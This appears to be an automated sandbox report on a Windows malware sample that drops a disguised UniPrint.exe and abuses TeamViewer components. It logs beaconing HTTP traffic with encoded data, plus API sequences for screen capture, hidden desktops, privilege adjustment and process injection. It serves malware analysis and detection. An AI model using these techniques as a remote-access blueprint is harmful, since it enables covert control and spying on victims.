Source: global trafficHTTP traffic detected: GET /dout.aspx?s=40082864&p=10000001&client=DynGate&data=FyQS8gCjHqmyuim0s7cwujq5MqWyvJMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJqSiHpg8MrGzGjExGLMxmpwbL5ibnBgam5gZGxuTKx6YmpcYFxscG5AoqZMhNLcwuTyegwEAAAASAAApKaCYgAIAAAiAAAB7ySFOURDklGN3FXhtz5fQYcmcXiwT9YXrd7SP4wIu0YyOFYq9yPUEQYpaG7+wnhbl5r+tU8j1VcHRkBZSOJG/A0Y7yY1YSgbi8gOUCGFRO/w26w+YKCZHaxwju7In6AFwX2azSetPIMUWj5HFTKPx6LGZM3a+27DQaxFWt7lD4A== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=40082864&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=40082873&p=10000001&client=DynGate&data=FyQS6QChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJbKyuDC2NLsynpiTJjC3M7qws7KetTCTJjSxsrc5sqo8uDKemBMmpKIemDwysbMaMTEYszGanBsvmJucGBqbmBkbG5MnN6ezILG6NLsypbKyuDC2NLsynpgTKTq3OjS2sp6ckym6uDg3uToysiMysLo6uTK5npiTKiGoJ6qqHpgTKx6YmpcYFxscG5AoqQ== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=40082873&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.198.151Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=12418339&m=fast&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.198.151Connection: Keep-AliveCache-Control: no-cache
Source: unknownHTTPS traffic detected: 45.153.241.148:443 -> 192.168.2.3:49752 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70986B70 GetDesktopWindow,GetDC,CreateCompatibleDC,RtlZeroMemory,GetWindowRect,CreateCompatibleBitmap,SelectObject,BitBlt,RtlZeroMemory,GetCursorInfo,RtlZeroMemory,GetIconInfo,RtlZeroMemory,GetObjectW,DrawIconEx,SHCreateMemStream,RtlZeroMemory,VirtualAlloc,RtlZeroMemory,VirtualFree,DeleteObject,DeleteDC,ReleaseDC,
Source: wogZe27GBB.exe, 00000000.00000002.248869618.000000000077A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,SendMessageA,GlobalUnWire,SetClipboardData,CloseClipboard,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_7098A020 GetCurrentThreadId,GetThreadDesktop,StrChrW,CreateDesktopW,CreateThread,WaitForSingleObject,CloseHandle,Sleep,CloseDesktop,
Source: wogZe27GBB.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_0040323C EntryPoint,7414E7F0,SetErrorMode,OleInitialize,SHGetFileInfo,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcat,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcat,lstrcmpi,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70985F30 CommandLineToArgvW,GetProcessHeap,HeapFree,CharLowerW,GetProcessHeap,HeapAlloc,RtlComputeCrc32,GetProcessHeap,HeapFree,GetTickCount,RtlRandom,StrChrW,wsprintfW,WritePrivateProfileStringW,Sleep,Sleep,GetDlgItem,PostMessageW,PostMessageW,PostMessageW,Sleep,Sleep,PostMessageW,Sleep,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,DeleteFileW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,GetTickCount,RtlRandom,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,wsprintfW,GetFileAttributesW,DeleteFileW,StrChrW,StrChrW,StrChrW,wsprintfW,ExpandEnvironmentStringsW,PathIsRelativeW,StrChrW,wsprintfW,StrRChrW,SHCreateDirectoryExW,StrChrW,GetProcessHeap,HeapFree,LocalFree,GetProcessHeap,HeapFree,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70985F30 CommandLineToArgvW,GetProcessHeap,HeapFree,CharLowerW,GetProcessHeap,HeapAlloc,RtlComputeCrc32,GetProcessHeap,HeapFree,GetTickCount,RtlRandom,StrChrW,wsprintfW,WritePrivateProfileStringW,Sleep,Sleep,GetDlgItem,PostMessageW,PostMessageW,PostMessageW,Sleep,Sleep,PostMessageW,Sleep,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,DeleteFileW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,GetTickCount,RtlRandom,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,wsprintfW,GetFileAttributesW,DeleteFileW,StrChrW,StrChrW,StrChrW,wsprintfW,ExpandEnvironmentStringsW,PathIsRelativeW,StrChrW,wsprintfW,StrRChrW,SHCreateDirectoryExW,StrChrW,GetProcessHeap,HeapFree,LocalFree,GetProcessHeap,HeapFree,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_00404853
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_00406131
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_0053C2D6
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_004A13AA
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_0053E430
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_004C97CD
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_00534810
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_005438ED
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_004AC8A9
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_00544B6A
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_004B9F5A
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_00546FFB
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_004A0FB2
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_0292F7CD
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_0292F9EC
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_0292F965
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_0294C17D
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 20_3_02880ABB
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: String function: 0040F6FE appears 62 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: String function: 0053BCB5 appears 419 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: String function: 0053E5C8 appears 32 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: String function: 0040DFA6 appears 31 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: String function: 004A1B0C appears 235 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: String function: 0053BCE8 appears 61 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70983760 GetProcessHeap,CreateEnvironmentBlock,RtlZeroMemory,StrChrW,RtlZeroMemory,CreateProcessAsUserW,CreateProcessAsUserW,Sleep,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DestroyEnvironmentBlock,CloseHandle,
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_00401000 NtdllDefWindowProc_A,BeginPaint,GetClientRect,DeleteObject,CreateBrushIndirect,FillRect,DeleteObject,CreateFontIndirectA,SetBkMode,SetTextColor,SelectObject,SelectObject,DrawTextA,SelectObject,DeleteObject,EndPaint,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70988AF0 EntryPoint,DisableThreadLibraryCalls,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryW,ExitProcess,PathAddBackslashW,PathAddBackslashW,GetProcessHeap,HeapAlloc,GetModuleFileNameW,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecW,PathAddBackslashW,SetCurrentDirectoryW,SHGetSpecialFolderPathW,PathAddBackslashW,StrChrW,lstrcatW,GetFileAttributesW,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameW,PathFindFileNameW,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetUserNameW,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,lstrlenW,GetCommandLineW,CommandLineToArgvW,CharLowerW,StrToIntW,LocalFree,RtlZeroMemory,GetPrivateProfileIntW,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,StrChrW,StrChrW,wsprintfW,wsprintfW,LoadLibraryW,ExitProcess,StrChrW,wsprintfW,LoadLibraryW,FindWindowW,FindWindowW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,StrChrW,wsprintfW,GetProcessHeap,HeapFree,LoadLibraryW,StrChrW,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_7098B420 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_709889F0 NtQuerySystemInformation,StrChrW,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,StrChrW,NtWriteVirtualMemory,NtFlushInstructionCache,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_7098B5F0 NtResumeThread,NtClose,HeapFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_7098B340 NtGetContextThread,NtSetContextThread,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_7098B570 NtSuspendThread,NtClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_7098B160 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70981C90 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70981A80 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_7098A880 NtQueryVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_7098B0B9 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_709826E0 RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70985220 RtlZeroMemory,RtlZeroMemory,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_7098B650 RtlMoveMemory,NtFlushInstructionCache,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70987240 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageW,StrChrW,KillTimer,RtlZeroMemory,StrChrW,wsprintfW,StrChrW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrChrA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntW,StrChrW,wsprintfW,WritePrivateProfileStringW,SetEvent,SetTimer,StrChrW,DispatchMessageW,GetMessageW,KillTimer,VirtualFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70982440 LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetCommandLineW,CommandLineToArgvW,lstrcmpiW,lstrcmpiW,StrRChrW,StrChrW,wsprintfW,OpenEventW,CreateEventW,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_7098B1A0 NtOpenThread,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70982FF0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessW,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_709827F0 GetFileAttributesW,GetProcessHeap,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RtlZeroMemory,RtlZeroMemory,CreateProcessW,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70987D00 PostThreadMessageW,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageW,CreateThread,CallWindowProcW,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70981570 NtAllocateVirtualMemory,NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70981960 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_709889F0 NtQuerySystemInformation,StrChrW,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,StrChrW,NtWriteVirtualMemory,NtFlushInstructionCache,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_7098B160 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70988AF0 EntryPoint,DisableThreadLibraryCalls,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryW,ExitProcess,PathAddBackslashW,PathAddBackslashW,GetProcessHeap,HeapAlloc,GetModuleFileNameW,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecW,PathAddBackslashW,SetCurrentDirectoryW,SHGetSpecialFolderPathW,PathAddBackslashW,StrChrW,lstrcatW,GetFileAttributesW,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameW,PathFindFileNameW,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetUserNameW,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,lstrlenW,GetCommandLineW,CommandLineToArgvW,CharLowerW,StrToIntW,LocalFree,RtlZeroMemory,GetPrivateProfileIntW,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,StrChrW,StrChrW,wsprintfW,wsprintfW,LoadLibraryW,ExitProcess,StrChrW,wsprintfW,LoadLibraryW,FindWindowW,FindWindowW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,StrChrW,wsprintfW,GetProcessHeap,HeapFree,LoadLibraryW,StrChrW,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70987240 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageW,StrChrW,KillTimer,RtlZeroMemory,StrChrW,wsprintfW,StrChrW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrChrA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntW,StrChrW,wsprintfW,WritePrivateProfileStringW,SetEvent,SetTimer,StrChrW,DispatchMessageW,GetMessageW,KillTimer,VirtualFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_7098B340 NtGetContextThread,NtSetContextThread,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_7098B420 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_7098B5F0 NtResumeThread,NtClose,HeapFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70987D00 PostThreadMessageW,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageW,CreateThread,CallWindowProcW,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_7098B570 NtSuspendThread,NtClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_7098A880 NtQueryVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_7098B0B9 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_7098B1A0 NtOpenThread,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70981960 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70981A80 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70985220 RtlZeroMemory,RtlZeroMemory,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,StrChrW,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70981C90 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70982440 LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetCommandLineW,CommandLineToArgvW,lstrcmpiW,lstrcmpiW,StrRChrW,StrChrW,wsprintfW,OpenEventW,CreateEventW,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70981570 NtAllocateVirtualMemory,NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_709826E0 StrChrW,RtlZeroMemory,NtCreateSection,StrChrW,NtMapViewOfSection,NtMapViewOfSection,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,StrChrW,NtClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_7098B650 RtlMoveMemory,NtFlushInstructionCache,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_709827F0 GetFileAttributesW,StrChrW,GetProcessHeap,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RtlZeroMemory,RtlZeroMemory,CreateProcessW,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70982FF0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessW,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: No import functions for PE file found
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameTV.dllT vs wogZe27GBB.exe
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameTeamViewer_Resource.dll\ vs wogZe27GBB.exe
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameTeamViewer.exel& vs wogZe27GBB.exe
Source: wogZe27GBB.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: wogZe27GBB.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: wogZe27GBB.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UniPrint.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UniPrint.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
